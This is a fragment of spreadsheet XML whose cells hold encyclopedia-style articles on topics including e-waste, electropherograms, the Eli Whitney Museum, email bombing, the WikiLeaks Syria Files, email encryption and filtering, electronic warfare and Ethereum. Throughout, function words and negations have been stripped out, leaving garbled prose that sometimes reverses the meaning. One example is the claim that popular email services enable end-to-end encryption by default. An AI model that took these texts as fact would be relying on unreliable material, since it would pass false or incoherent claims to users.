factory started bringing foreign e-waste items crushed computers, circuit boards cables recycling mine electronics valuable metal components like copper, silver gold. items also contain lead, cadmium mercury, highly toxic mishandled processing. apart feeling faint noxious fumes emitted processing, local claimed factory also contaminated water. "when raining, water went pile waste passed house went soil water system. water tests conducted pr</t>
  </si>
  <si>
    <t>Electropherogram</t>
  </si>
  <si>
    <t>electropherogram, electrophoregram, record chart produced electrophoresis used analytical technique, primarily fields molecular biology biochemistry.in field genetics, electropherogram plot fragment sizes, typically used genotyping sequencing. such plots often achieved using instrument automated sequencer. such electropherograms used determine sequence genotypes, genotypes based length specific fragments. these genotypes used for: genealogical testing paternity testing profiling phylogenetics population genetics also electrophoresis nucleic acids references external links phph web-based tool electropherogram quality analysis systematic differences electropherogram peak heights reported different versions genescan software dys464 electropherogram interpretation discrepancy images</t>
  </si>
  <si>
    <t>Eli Whitney Museum</t>
  </si>
  <si>
    <t>whitney museum, hamden, connecticut, experimental learning workshop students, teachers, families. museum's main building located portion whitney factory site, factory erected whitney 1798. museum focuses teaching experiments roots design invention, featuring hands-on building projects exhibits whitney gilbert. site history museum located grounds originally developed whitney produce muskets site purchased september 1798. factory powered water mill river produced muskets united states government. june 1798, contracted produce 10,000 muskets delivered within months cost $134,000.00; fact, took years. when signed contract, whitney factory, workers experience manufacturing. however, letter secretary treasury oliver wolcott, fellow yale university graduate friend, whitney written: persuaded machinery moved water adapted business would greatly diminish labor facilitate manufacture article. machines forging, rolling, floating, boring, grinding, polishing, etc. made advantage.... (may 1798)whitney's factory forefront american industrial revolution, using water-powered machinery, among first standardized, interchangeable parts (for parts). area around museum known whitneyville, manufacturing village constructed along mill river house workers whitney armory, made famous painter william giles munson, sketched armory 1826, year whitney died, creating least paintings sketches next decades. armory produced firearms years started losing competition winchester repeating arms company late 1880s aging inventor whitney sold factory 1888, promptly closed down. defensive patent aggregation winchester, design firm ever produced again. grounds, span sides whitney avenue cross mill river, still feature barn, stone coal shed boarding house date back days whitneyville operational armory, along reconstruction ithiel town's innovative lattice truss covered bridge erected original pilings bridges built service whitney armory. museum occupies portion site, whitney avenue mill river, occupying brick factory building built site 1890. barn boarding house, located west whitney avenue, occupied nonprofit organizations. museum exhibits activities whitney museum exhibits whitney famous invention, cotton gin. other exhibits cover historic site gilbert, inventor maker best known invention erector set. museum experimental learning workshop design specializes building projects children blending science invention. site located adjacent first built whitney power armory, raised current height whitney blake provide power. museum also features water tables canal locks adjacent water reservoir well hiking trails. addition visitor hours, museum hosts summer holiday programs birthday parties, home annual leonardo challenge, celebration improvisational creativity invites artists designers haven, connecticut area create uncommon inventions designs common objects, culminating exhibition creative efforts. apprenticeship program addition weeklong education programs, museum supports apprentices time longer-term, paid, hands-on experience. apprentices generally work hours school year, hours summer. they learn design, fabrication, teaching skills, work developing teaching exhibitions projects. apprenticeship alumni include jennifer oxley (emmy award-winning children's creator), emily oster (economist), joshua revkin (star world champion sailor). also national register historic places listings haven county, connecticut references external links official website innovative museums historic american engineering record (haer) ct-2, "eli whitney armory, west whitney avenue, armory street vicinity, hamden, haven county, ct", photos, measured drawing, data pages haer ct-2-a, "eli whitney armory, barn", photos, measured drawings, data pages haer ct-2-b, "eli whitney armory, forge building", photos, measured drawing, data pages haer ct-2-c, "eli whitney armory, fuel storage shed", photos, measured drawings, data pages haer ct-2-d, "eli whitney armory, boarding house", photos, measured drawing, data page</t>
  </si>
  <si>
    <t>Email authentication</t>
  </si>
  <si>
    <t>Email bomb</t>
  </si>
  <si>
    <t>internet usage, email bomb form abuse sends large volumes email address overflow mailbox, overwhelm server email address hosted denial-of-service attack (dos attack) smoke screen distract attention important email messages indicating security breach. methods there three methods perpetrating email bomb: mass mailing, list linking bombing. mass mailing mass mailing consists sending numerous duplicate emails email address. these types mail bombs simple design extreme simplicity means easily detected spam filters. email-bombing using mass mailing also commonly performed ddos attack employing botnets; hierarchical networks computers compromised malware attacker's control. similar spamming, attacker instructs botnet send millions emails, unlike normal botnet spamming, emails addressed addresses attacker wishes flood. this form email bombing similar ddos flooding attacks. targets frequently dedicated hosts handling website email accounts business, type attack devastating services host. this type attack difficult defend simple mass-mailing bomb multiple source addresses possibility zombie computer sending different message employing stealth techniques defeat spam filters. list linking list linking, also known "email cluster bomb", means signing particular email address several email list subscriptions. victim unsubscribe unwanted services manually. attack carried automatically simple scripts: easy, almost impossible trace back perpetrator, potentially destructive. massive attack kind targeting .gov email addresses observed august 2016.in order prevent type bombing, email subscription services send confirmation email person's inbox email used register subscription. however, even confirmation emails contribute attack. better defense would prevent websites exploited without abandoning subscription forms. after subscription form filled out, website would dynamically create mailto link itself. legitimate user would send message validate request without receiving email website. while sender's email could spoofed, sender's smtp address cannot. list manager therefore verify email form request matches originating smtp server validation message. large number confirmation emails initiated registration bots signing specific email address multitude services used distract view important emails indicating security breach happened elsewhere. example, amazon account hacked, hacker contrive flood confirmation emails sent email address associated account mask fact amazon shipment address changed purchases made hacker. bombing bomb variant mail-bombing. after commercial mail servers began checking mail anti-virus software filtering certain malicious file types, exe, rar, zip, 7-zip, mail server software configured unpack archives check contents well. idea combat solution composing "bomb" consisting enormous text file, containing, example, letter repeating millions times. such file compresses relatively small archive, unpacking (especially early versions mail servers) would greater amount processing, could result denial service. .tar.gz file even contain copy itself, causing infinite recursion server checks nested archive files. text message bomb "text bomb" similar variant sending large number text messages sms. technique means cyberbullying online harassment. apps online android operating system since banned means sending text bombs. text messages also lead high phone bill charges mobile plans. additionally, certain phone apps also created prevent text bombs android references external links cert email bombing spamming email cluster bomb research</t>
  </si>
  <si>
    <t>Syria Files</t>
  </si>
  <si>
    <t>july 2012, wikileaks began publishing called syria files, collection million emails syrian political figures ministries companies including finmeccanica brown lloyd james dating august 2006 march 2012. release release files began july 2012. database comprises 2,434,899 emails domains. least 400,000 files arabic 68,000 files russian. media organisations working wikileaks release include lebanese daily akhbar, egyptian daily al-masry al-youm, italian weekly l'espresso, german public radio television broadcaster norddeutscher rundfunk (ndr) consortium, french information website owni spanish website público. associated press (ap) news agency initially announced wikileaks helping release. claim withdrawn wikileaks spokesperson stated "reviewing emails possible coverage [and] advance agreement [it] might handle material." according akhbar's analysis, syria files "illuminate—often small ways—the nature power within inner workings certain political economic elements syria". akhbar states confidence "the emails authentic, senders receivers mainly are". data retrieval weeks following syria files' release july 2012, hacktivist group anonymous collective claimed credit obtaining emails providing wikileaks. anonymous stated "worked night" order access computer servers syria "the data available massive downloading taken several weeks." anonymous gave data wikileaks judged wikileaks "supremely well equipped handle disclosure magnitude". anonymous stated long bashar al-assad remains power, continue assist courageous freedom fighters activists syria".in 2016, interview member hacktivist group revolusec jazeera english pages united states sealed court records viewed daily gave credit revolusec, whose membership overlaps anonymous, data retrieval transmission wikileaks. revolusec claimed complete access syrian internet routers switches, including syrian computer society's scs-net. revolusec described aims project exposing censorship human rights abuses supporting syrians' human rights. revolusec's attacks syrian government lasted year. cases finmeccanica according emails published wikileaks july 2012, italian conglomerate finmeccanica increased sale mobile communications equipment syrian authorities 2011, delivering damascus suburb muadamia 2011, syrian civil started, sending engineers damascus february 2012 provide training using communications equipment helicopter terminals, conflict continued. brown lloyd james 2011, public relations firm brown lloyd james sent email syrian authorities create appearance pursuing reform repressing uprising", ynetnews' description email published wikileaks july 2012. brown lloyd james advised "refocusing perception outsiders syrians reform provide political cover generally sympathetic government, delegitimize critics home abroad. view, president needs communicate often finely-tuned messaging first lady needs game. absence public figure popular, capable, attuned hopes people excellency critical moment conspicuous. show strength sympathy once." company recommended public relations campaign "create reform 'echo-chamber' developing media coverage outside syria points president's difficult task wanting reform" "coverage [would] rebound syria". brown lloyd james also recommended "countering daily torrent criticism lies" "[a] 24-hour media monitoring response system [that] place assets markets; [monitoring] social media sites [challenging removing] false sites; steady, constantly updated messaging document contains talking points geared latest developments."brown lloyd james stated document paid for, "'last-ditch' effort encourage peaceful outcome rather violence', sent asma al-assad, wife president bashar al-assad. bashar asma al-assad july 2012, akhbar presented analysis emails president bashar al-assad wife asma al-assad. akhbar listed main topics al-assad's syria files emails, stated, "viewed prism 'syria files', syria’s first couple appear occupied representative capacities, ample time devoted state palatial gardens, renovations, stationary needs low-level employees, also issues related bolstering couple’s image, charitable efforts political favors. during first year uprising covered emails cache, official unofficial correspondence first couple ministry presidential affairs present references ongoing tumult .... real sense tangible power behalf first couple present within 'syria files.' what revealed façade, perhaps fittingly, brand calculated cloak another system: military-security machine, remains tightly control prying eyes." rami makhlouf syria files examined akhbar show businessman rami makhlouf publicly claimed respond protestors' demands "repenting" business, selling shares investing money time charity development projects, continued invest several banks 2011 2012. late january 2012, bought times much shares value) sold, buying 127,000,000 selling 8,670,000 shares, mostly qatar national bank–syria syria international islamic bank. commentary reactions wikileaks leader julian assange said files helps merely criticise group another, understand interests, actions thoughts. understanding conflict hope resolve it." omitted documents september 2016, reporters daily dot, using information sealed court documents, stated leaked version syria files omitted records €2,000,000,000 transfer central bank syria russian government-owned bank. reporters skeptical omission coincidence. wikileaks stated published syria files obtained. references external links syria files syria files press conference project tetratac syria (confidential dossier selex_finmeccanica)</t>
  </si>
  <si>
    <t>Email encryption</t>
  </si>
  <si>
    <t>email encryption encryption email messages protect content read entities intended recipients. email encryption also include authentication. email prone disclosure information. most emails encrypted transmission, stored clear text, making readable third parties email providers. default, popular email services gmail outlook enable end-to-end encryption. means available tools, persons designated recipients read email contents.email encryption rely public-key cryptography, users publish public others encrypt messages them, keeping secret private decrypt messages digitally encrypt sign messages send. encryption protocols with original design email protocol, communication email servers plain text, posed huge security risk. over years, various mechanisms proposed encrypt communication email servers. encryption occur transport level (aka "hop hop") end-to-end. transport layer encryption often easier use; end-to-end encryption provides stronger defenses, difficult use. transport-level encryption commonly used email encryption extensions starttls. (ssl) layer plaintext communication, allowing email servers upgrade plaintext communication encrypted communication. assuming email servers sender recipient side support encrypted communication, eavesdropper snooping communication mail servers cannot sniffer email contents. similar starttls extensions exist communication email client email server (see imap4 pop3, stated 2595). starttls used regardless whether email's contents encrypted using another protocol. encrypted message revealed, altered intermediate email relays. words, encryption takes place individual smtp relays, sender recipient. this good consequences. positive trait transport layer encryption users need change anything; encryption automatically occurs send email. addition, since receiving organizations decrypt email without cooperation user, receiving organizations virus scanners spam filters delivering email recipient. however, also means receiving organization anyone breaks organization's email system (unless steps taken) easily read modify email. receiving organization considered threat, end-to-end encryption necessary. electronic frontier foundation encourages starttls, launched 'starttls everywhere' initiative "make simple easy everyone help ensure communications (over email) aren’t vulnerable mass surveillance." support starttls become quite common; google reports gmail, incoming email outgoing email encrypted using starttls july 2018.mandatory certificate verification historically viable internet mail delivery without additional information, many certificates verifiable want email delivery fail case. result, email delivered uses opportunistic encryption. dane proposed standard makes incremental transition verified encryption internet mail delivery possible. starttls everywhere project uses alternative approach: support “preload list” email servers promised support starttls, help detect prevent downgrade attacks. end-to-end encryption end-to-end encryption, data encrypted decrypted points. words, email sent end-to-end encryption would encrypted source, unreadable service providers like gmail transit, decrypted endpoint. crucially, email would decrypted user computer would remain encrypted, unreadable form email service like gmail, keys available decrypt some email services integrate end-to-end encryption automatically. notable protocols end-to-end email encryption include: bitmessage privacy guard (gpg) pretty good privacy (pgp) s/mimeopenpgp data encryption standard allows end-users encrypt email contents. there various software email-client plugins allow users encrypt message using recipient's public sending core, openpgp uses public cryptography scheme email address associated public/private pair. openpgp provides users encrypt email without support server sure intended recipient read however, usability issues openpgp requires users public/private pairs make public keys available widely. also, protects content email, metadata untrusted party still observe sent email whom. general downside encryption schemes—where server decryption keys—is makes server side search almost impossible, thus impacting usability. content email also end-to-end encrypted putting encrypted file (using kind file encryption tool) sending encrypted file email attachment. demonstrations signed encrypted email over internet demonstration shown organizations collaborate effectively using secure email. previous barriers adoption overcome, including bridge provide scalable public infrastructure (pki) network security guards checking encrypted content passing corporate network boundaries avoid encryption used hide malware introduction information leakage. setting using email encryption transport layer encryption using starttls must receiving organization. this typically straightforward; valid certificate must obtained starttls must enabled receiving organization's email server. prevent downgrade attacks organizations send domain 'starttls policy list'most full-featured email clients provide native support s/mime secure email (digital signing message encryption using certificates). other encryption options include privacy guard (gnupg). free commercial software (desktop application, webmail add-ons) available well.while protect messages, also hard correct way. researchers carnegie mellon university published paper 1999 showing people figure sign encrypt messages using current version pgp. eight years later, another group carnegie mellon researchers published follow-up paper saying that, although newer version made easy decrypt messages, people still struggled encrypting signing messages, finding verifying people's public encryption keys, sharing keys.because encryption difficult users, security compliance managers companies government agencies automate process employees executives using encryption appliances services automate encryption. instead relying voluntary co-operation, automated encryption, based defined policies, takes decision process users' hands. emails routed gateway appliance configured ensure compliance regulatory security policies. emails require automatically encrypted sent.if recipient works organization uses encryption gateway appliance, emails automatically decrypted, making process transparent user. recipients behind encryption gateway need take extra step, either procuring public key, logging online portal retrieve message. encrypted email providers since 2000, number available encrypted email providers increased significantly. notable providers include: hushmail mailfence protonmail tutanota skiff also email authentication email privacy end-to-end encryption https (cryptography) mailbox provider secure messaging references</t>
  </si>
  <si>
    <t>Email filtering</t>
  </si>
  <si>
    <t>email filtering processing email organize according specified criteria. term apply intervention human intelligence, often refers automatic processing messages smtp server, possibly applying anti-spam techniques. filtering applied incoming emails well outgoing ones. depending calling environment, email filtering software reject item initial smtp connection stage pass unchanged delivery user's mailbox. also possible redirect message delivery elsewhere, quarantine checking, modify 'tag' way. motivation common uses mail filters include organizing incoming email removal spam computer viruses. mailbox providers filter outgoing email promptly react spam surges result compromised accounts. less common inspect outgoing email companies ensure employees comply appropriate policies laws. users might also employ mail filter prioritize messages, sort folders based subject matter criteria. methods mailbox providers also install mail filters mail transfer agents service customers. anti-virus, anti-spam, filtering, authentication-based rejections common filter types. corporations often filters protect employees information technology assets. catch-all filter "catch all" emails addressed domain exist mail server help avoid losing emails misspelling. users, able install separate programs (see links below), configure filtering part email program (email client). email programs, users make personal, "manual" filters automatically filter mail according chosen criteria. inbound outbound filtering mail filters operate inbound outbound email traffic. inbound email filtering involves scanning messages internet addressed users protected filtering system lawful interception. outbound email filtering involves reverse scanning email messages local users potentially harmful messages delivered others internet. method outbound email filtering commonly used internet service providers transparent smtp proxying, email traffic intercepted filtered transparent proxy within network. outbound filtering also take place email server. many corporations employ data leak prevention technology outbound mail servers prevent leakage sensitive information email. customization mail filters varying degrees configurability. sometimes make decisions based matching regular expression. other times, code match keywords message body, perhaps email address sender message. more complex control flow logic possible programming languages; typically implemented data-driven programming language, procmail, specifies conditions match actions take matching, involve matching. some advanced filters, particularly anti-spam filters, statistical document classification techniques naive bayes classifier others natural language processing organize incoming emails. image filtering complex image-analysis algorithms detect skin-tones specific body shapes normally associated pornographic images. microsoft outlook includes user-generated email filters called "rules". also bayesian spam filtering crm114 information filtering markovian discrimination outbound spam protection sieve (mail filtering language) standard describing mail filters white list#email whitelists references external links spam filtering curlie</t>
  </si>
  <si>
    <t>Electronic warfare</t>
  </si>
  <si>
    <t>electronic warfare (ew) action involving electromagnetic spectrum spectrum) directed energy control spectrum, attack enemy, impede enemy assaults. purpose electronic warfare deny opponent advantage of—and ensure friendly unimpeded access to—the spectrum. applied air, sea, land, and/or space crewed uncrewed systems, target communication, radar, military civilian assets. electromagnetic environment military operations executed information environment increasingly complicated electromagnetic spectrum. electromagnetic spectrum portion information environment referred electromagnetic environment (eme). recognized need military forces unimpeded access electromagnetic environment creates vulnerabilities opportunities electronic warfare support military operations.within information operations construct, element information warfare; specifically, element offensive defensive counterinformation.nato different arguably encompassing comprehensive approach military committee conceptual document 2007 (mcm_0142 2007 military committee transformation concept future nato electronic warfare) recognised operational maneuver space warfighting environment/domain. nato, considered warfare eme. nato adopted simplified language parallels used warfighting environments like maritime, land air/space. example, electronic attack (ea) offensive energy, electronic defense (ed) electronic surveillance (es). traditional nato terms, electronic countermeasures (ecm), electronic protective measures (epm) electronic support measures (esm) retained contribute support electronic attack (ea), electronic defense (ed) electronic surveillance (es). besides operations include intelligence, surveillance, target acquisition, reconnaissance (istar) signals intelligence (sigint). subsequently, nato issued policy doctrine addressing nato defense lines development. primary activities developed time exploit opportunities vulnerabilities inherent physics energy. activities used include: electro-optical, infrared radio frequency countermeasures; compatibility deception; radio jamming, radar jamming deception electronic counter-countermeasures anti-jamming); electronic masking, probing, reconnaissance, intelligence; electronic security; reprogramming; emission control; spectrum management; wartime reserve modes. subdivisions electronic warfare consists three major subdivisions: electronic attack (ea), electronic protection (ep), electronic warfare support (es). electronic attack electronic attack (ea), also known electronic countermeasures (ecm), involves offensive electromagnetic energy weapons, directed energy weapons, anti-radiation weapons attack personnel, facilities, equipment intent degrading, neutralizing, destroying enemy combat capability including human life. case electromagnetic energy, action commonly referred "jamming" performed communications systems radar systems. case anti-radiation weapons, many times includes missiles bombs home specific signal (radio radar) follow path directly impact, thus destroying system broadcasting. electronic protection electronic protection (ep), also known electronic protective measure (epm), electronic counter-countermeasure (eccm) measures used protect enemy electronic attack (ea) protect friendly forces unintensionally inevitably deploy equivalent electronic attack friendly forces. (sometimes called fratricide). effectiveness electronic protection (ep) level ability counter electronic attack (ea). flares often used distract infrared homing missiles miss target. flare rejection logic guidance (seeker head) infrared homing missile counter adversary's flares example while defensive actions (jamming) (defeating jamming) protect personnel, facilities, capabilities, equipment, protects effects (friendly and/or adversary). other examples include spread spectrum technologies, restricted frequency lists, emissions control (emcon), observability (stealth) technology.electronic warfare self-protection (ewsp) suite countermeasure systems fitted primarily aircraft purpose protecting host weapons fire include, among others: directional infrared countermeasures (dircm, flare systems forms infrared countermeasures protection infrared missiles; chaff (protection radar-guided missiles); drfm decoy systems (protection radar-targeted anti-aircraft weapons). electronic warfare tactics range (ewtr) practice range provides training personnel electronic warfare. there examples ranges europe: spadeadam northwest county cumbria, england multinational aircrew electronic warfare tactics facility polygone range border germany france. ewtrs equipped ground-based equipment simulate electronic warfare threats aircrew might encounter missions. other training tactics ranges available ground naval forces well. antifragile step beyond standard occurring communications link jammed actually increases capability result jamming attack, although possible certain circumstances reactive forms jamming.in november 2021, israel aerospace industries announced electronic warfare system named scorpius disrupt radar communications ships, uavs, missiles simultaneously varying distances. electronic warfare support electronic warfare support (es) subdivision involving actions taken operational commander operator detect, intercept, identify, locate, and/or localize sources intended unintended radiated electromagnetic (em) energy. this often referred simply reconnaissance, although today, common terms intelligence, surveillance reconnaissance (isr) intelligence, surveillance, target acquisition, reconnaissance (istar). purpose provide immediate recognition, prioritization, targeting threats battlefield commanders.signals intelligence (sigint), discipline overlapping related process analyzing identifying intercepted transmissions sources radio communication, mobile phones, radar microwave communication. sigint broken three categories: electronic intelligence (elint), communications intelligence (comint), foreign instrumentation signals intelligence fisint. analysis parameters measured signals categories include frequency, bandwidth, modulation, polarization. distinction sigint determined controller collection assets, information provided, intended purpose information. electronic warfare support conducted assets operational control commander provide tactical information, specifically threat prioritization, recognition, location, targeting, avoidance. however, assets resources tasked simultaneously collect information meets collection requirements strategic intelligence. history history electronic warfare goes back least beginning 20th century. earliest documented consideration russo-japanese 1904–1905. japanese auxiliary cruiser shinano maru located russian baltic fleet tsushima strait, communicating fleet's location "wireless" imperial japanese fleet captain russian warship orel requested permission disrupt japanese communications link attempting transmit stronger radio signal shinano maru's signal, hoping distort japanese signal receiving end. russian admiral zinovy rozhestvensky refused advice denied orel permission electronically enemy, circumstances might proved invaluable. intelligence japanese gained ultimately decisive battle tsushima. battle humiliating russia. russian navy lost battleships cruisers destroyers. these staggering losses effectively ended russo-japanese japan's favor. 4,380 russians killed 5,917 captured, including admirals, 1,862 interned.during world allies axis powers extensively used winston churchill referred "battle beams". navigational radars gained vector bombers targets back home base. first application wwii defeat navigational radars. chaff also introduced wwii confuse defeat tracking radar systems. time progressed battlefield communication radar technology improved, electronic warfare. electronic warfare played major role many military operations vietnam war. aircraft bombing runs air-to-air missions often relied survive battle, although many defeated vietnamese eccm.as another example, 2007, israeli attack suspected syrian nuclear site operation outside operation orchard) used electronic warfare systems disrupt syrian defenses israeli jets crossed much syria, bombed targets, returned israel undeterred. target flight f-15 aircraft suspected nuclear reactor construction near euphrates river modeled north korean reactor supposedly financed iranian assistance. some reports israeli systems deactivated syria's defense systems entire period raid, infiltrating country, bombing target escaping. december 2010, russian army received first land-based army operated multifunctional electronic warfare system known borisoglebsk developed sozvezdie. development system started 2004 evaluation testing successfully completed december 2010. borisoglebsk-2 brings four different types jamming stations single system single control console, helping operator make battlefield decisions within seconds. borisoglebsk-2 system mounted nine mt-lb armored vehicles intended suppress mobile satellite communications satellite-based navigation signals. this system developed conduct electronic reconnaissance suppression radio-frequency sources. newspaper, svenska dagbladet, said initial usage caused concern within nato. russian blog described borisoglebsk-2 thus: 'borisoglebsk-2', compared predecessors, better technical characteristics: wider frequency bandwidth conducting radar collection jamming, faster scanning times frequency spectrum, higher precision identifying location source radar emissions, increased capacity suppression. popular culture movie spaceballs, electronic attack "jams" weapons system literal jam. gun: maverick behind enemy lines, characters utilize chaff flares f-18s confuse/deflect guided missiles. also cyberwarfare electromagnetic pulse electromagnetic interference electronic harassment ivan's hammer l3harris technologies suppression enemy defenses (sead)other electronic warfare systems: adm-160 mald krasukha (electronic warfare system) radar warning receiver (rwr) samyukta electronic warfare system shadow (radar)historic: 36th electronic warfare squadron 55th wing battle latakia: first recorded deception naval battle group rafu.s. specific: association crows darpa electronic warfare officer fleet electronic warfare center joint functional component command network warfare national electronics museum u.s. marine corps radio reconnaissance platoon usacewp (united states army computer network operations-electronic warfare proponents references citations sources further reading 101: first course electronic warfare; david adamy; 2001; isbn 978-1580531696. 102: second course electronic warfare; david adamy; 2004; isbn 978-1580536868. deception war; latimer; 2001; isbn 978-0719556050. 3-36: electronic warfare operations. safeguarding soldiers through technology. fort leavenworth, u.s. army combined arms center archived 2011-09-28 wayback machine (cac), february 2009 pdf, also: john milburn: army manual raises emphasis electronic warfare. washington post, february 2009. jogiaas, aadu. "disturbing soviet transmissions august 1991". archived original november 2011. bolton, matt; munro, matt (2011). "the tallinn cables" (pdf). lonely planet magazine (december): 48–55. archived original (pdf) 2013-11-13.</t>
  </si>
  <si>
    <t>Ethereum</t>
  </si>
  <si>
    <t>ethereum decentralized, open-source blockchain smart contract functionality. ether (eth native cryptocurrency platform. among cryptocurrencies, ether second bitcoin market capitalization.ethereum conceived 2013 programmer vitalik buterin. additional founders ethereum included gavin wood, charles hoskinson, anthony iorio joseph lubin. 2014, development work began crowdfunded, network went live july 2015. ethereum allows anyone deploy permanent immutable decentralized applications onto users interact. decentralized finance (defi) applications provide broad array financial services without need typical financial intermediaries like brokerages, exchanges, banks, allowing cryptocurrency users borrow holdings lend interest. ethereum also allows users create exchange nfts, unique tokens representing ownership associated asset privilege, recognized number institutions. additionally, many cryptocurrencies utilize erc-20 token standard ethereum blockchain utilized platform initial coin offerings. series upgrades called ethereum includes transition proof stake aims increase transaction throughput using sharding. history founding (2013–2014) ethereum initially described late 2013 white paper vitalik buterin, programmer co-founder bitcoin magazine, described build decentralized applications. buterin argued bitcoin core developers bitcoin blockchain technology could benefit applications besides money needed robust language application development: could lead attaching real-world assets, stocks property, blockchain. 2013, buterin briefly worked etoro yoni assia colored coins project drafted white paper outlining additional cases blockchain technology. however, failing gain agreement project proceed, proposed development platform robust scripting language—a turing-complete programming language—that would eventually become ethereum.ethereum announced north american bitcoin conference miami, january 2014. during conference, gavin wood, charles hoskinson, anthony iorio (who financed project) rented house miami buterin could develop fuller sense ethereum might become. iorio invited friend joseph lubin, invited reporter morgen peck, bear witness. peck subsequently wrote experience wired. months later founders zug, switzerland, buterin told founders project would proceed non-profit. hoskinson left project time soon founded iohk, blockchain company responsible cardano.ethereum unusually long list founders. anthony iorio wrote: "ethereum founded vitalik buterin, myself, charles hoskinson, mihai alisie amir chetrit (the initial december 2013. joseph lubin, gavin wood, jeffrey wilcke added early 2014 founders." buterin chose name ethereum browsing list elements science fiction wikipedia. stated, immediately realized liked better alternatives seen; suppose fact [it] sounded nice word 'ether', referring hypothetical invisible medium permeates universe allows light travel." buterin wanted platform underlying imperceptible medium applications running development (2014) formal development software underlying ethereum began early 2014 swiss company, ethereum switzerland gmbh (ethsuisse). idea putting executable smart contracts blockchain needed specified software could implemented. this work done gavin wood, chief technology officer, ethereum yellow paper specified ethereum virtual machine. subsequently, swiss non-profit foundation, ethereum foundation (stiftung ethereum), founded. development funded online public crowd sale july august 2014, participants bought ethereum value token (ether) another digital currency, bitcoin. while early praise technical innovations ethereum, questions also raised security scalability. launch event (2014–2016) several codenamed prototypes ethereum developed months 2014 2015 ethereum foundation part proof-of-concept series. "olympic" last prototype public beta pre-release. olympic network gave users bounty 25,000 ether stress-testing ethereum blockchain. july 2015, "frontier" marked official launch ethereum platform, ethereum created "genesis block." genesis block contained 8,893 transactions allocating various amounts ether different addresses, block reward eth. since initial launch, ethereum undergone number planned protocol upgrades, important changes affecting underlying functionality and/or incentive structures platform. protocol upgrades accomplished means hard fork. 2016, decentralized autonomous organization called dao—a smart contracts developed platform—raised record us$150 million crowd sale fund project. exploited june 2016 us$50 million tokens stolen unknown hacker. event sparked debate crypto-community whether ethereum perform contentious "hard fork" reappropriate affected funds. this resulted network splitting blockchains: ethereum theft reversed ethereum classic continued original chain. hard fork created rivalry networks. after hard fork, ethereum subsequently forked twice fourth quarter 2016 deal attacks. continued development milestones (2017–present) march 2017, various blockchain startups, research groups, fortune companies announced creation enterprise ethereum alliance (eea) founding members. 2017, nonprofit organization enterprise members, including consensys, group, cornell university's research group, toyota research institute, samsung sds, microsoft, intel, morgan, cooley llp, merck kgaa, dtcc, deloitte, accenture, banco santander, mellon, ing, national bank canada. july 2017, members alliance, including mastercard, cisco systems, sberbank, scotiabank.in january 2018, ethereum second-largest cryptocurrency terms market capitalization, behind bitcoin. 2021, maintained relative position.after constantinople upgrade february 2019, network upgrades made within month late year: istanbul december 2019 muir glacier january 2020.in 2019, ethereum foundation employee virgil griffith arrested government presenting blockchain conference north korea. would later plead guilty charges 2021.in march 2021, visa inc. announced began settling stablecoin transactions using ethereum. april 2021, morgan chase, ubs, mastercard announced investing us$65 million consensys, software development firm builds ethereum-related infrastructure.there network upgrades 2021. first "berlin", implemented april 2021. second "london", took effect august. london upgrade included ethereum improvement proposal ("eip") 1559, mechanism reducing transaction volatility. mechanism causes portion ether paid transaction fees block destroyed rather given miner, reducing inflation rate ether potentially resulting periods deflation.on august 2021, blockchain experienced brief fork result clients running different incompatible software versions.in august 2022, three israeli researchers (aviv yaish, gilad stern aviv zohar) disclosed found first instance in-the-wild attack major cryptocurrency, specifically ethereum. attack, call "uncle maker", executed f2pool mining pool starting october 2020 lasting least august 2022. this attack enabled f2pool game ethereum's proof work mechanism manner ensures f2pool's blocks case tied blocks mined pools. ethereum open-source development currently underway multi-year major upgrade ethereum known ethereum eth2.the main purpose upgrade increase transaction throughput network current rate transactions second theoretically, tens thousands transactions second. this accomplished splitting workload many blockchains running parallel (referred "sharding") share common consensus proof-of-stake blockchain, maliciously tamper singular chain would require tamper common consensus, would cost attacker could gain attack. ethereum consists several upgrades ethereum protocol: "phase "beacon chain") launched december 2020 created beacon chain, proof-of-stake (pos) blockchain central coordination consensus ethereum 2.0. "phase "the merge") merge beacon chain current ethereum network, transitioning consensus mechanism proof-of-work proof-of-stake. january 2022, expected released third quarter 2022, august 2022, ethereum core developers formed consensus around final protocol upgrade parameters, resulting specific planned date "the merge" approximately mid-september. "phase "shard chains") implement state execution shard chains current ethereum chain expected become shards ethereum 2.0. shard chains spread network's load across chains. january 2022, expected released 2023. design ethereum permissionless, non-hierarchical network computers (nodes) build come consensus ever-growing series "blocks", batches transactions, known blockchain. each block contains identifier chain must precede block considered valid. whenever node adds block chain, executes transactions block order listed, thereby altering balances storage values ethereum accounts. these balances values, collectively known "state", maintained node separately blockchain, merkle tree. each node communicates relatively small subset network—its "peers". whenever node wishes include transaction blockchain, sends copy transaction peers, send copy peers, way, propagates throughout network. certain nodes, called miners, maintain list transactions create blocks, send rest network. whenever node receives block, checks validity block transactions therein and, finds block valid, adds blockchain executes transactions. since block creation broadcasting permissionless, node receive multiple blocks competing successor particular block. node keeps track valid chains result regularly drops shortest one: according ethereum protocol, longest chain given time considered canonical one. ether ether (eth) cryptocurrency generated accordance ethereum protocol reward miners proof-of-work system adding blocks blockchain. ether represented state unsigned integer associated account, account's balance denominated (1018 ether). each block, generated addition protocol-specified amount, currently 1018 (equal eth), balance account miner's choosing. this known block reward. additionally, ether currency accepted protocol payment transaction fee, also goes miner. block reward together transaction fees provide incentive miners keep blockchain growing (i.e. keep processing transactions). therefore, fundamental operation network. ether "sent" account another transaction, simply entails subtracting amount sent sender's balance adding amount recipient's balance.ether often erroneously referred "ethereum".ether listed exchanges currency code eth. greek uppercase character sometimes used currency symbol.the shift ethereum reduce issuance rate ether. there currently implemented hard total supply ether. accounts there types accounts ethereum: user accounts (also known externally-owned accounts) contracts. both types balance, send account, call public function contract create contract, identified blockchain state account address.user accounts type account create transactions. transaction valid, must signed using sending account's private key, 64-character hexadecimal string account's address derived. algorithm used produce signature ecdsa. importantly, algorithm allows derive signer's address signature without knowing private key. contracts type account associated code functions variable declarations) contract storage (the values variables given time). contract function take arguments return values. addition control flow statements, body function include instructions send eth, read write contract's storage, create temporary storage (memory) vanishes function, perform arithmetic hashing operations, call contract's functions, call public functions contracts, create contracts, query information current transaction blockchain. addresses ethereum addresses composed prefix "0x" common identifier hexadecimal) concatenated rightmost bytes keccak-256 hash ecdsa public (the curve used so-called secp256k1). hexadecimal, digits represent byte, addresses contain hexadecimal digits, e.g. 0xb794f5ea0ba39494ce839613fffba74279579268. contract addresses format, however, determined sender creation transaction nonce. virtual machine ethereum virtual machine (evm) runtime environment transaction execution ethereum. includes stack, memory, balance (see below), program counter, persistent storage accounts (including contract code). when transaction calls contract's function, arguments call added stack translates contract's bytecode stack operations. stack items stored 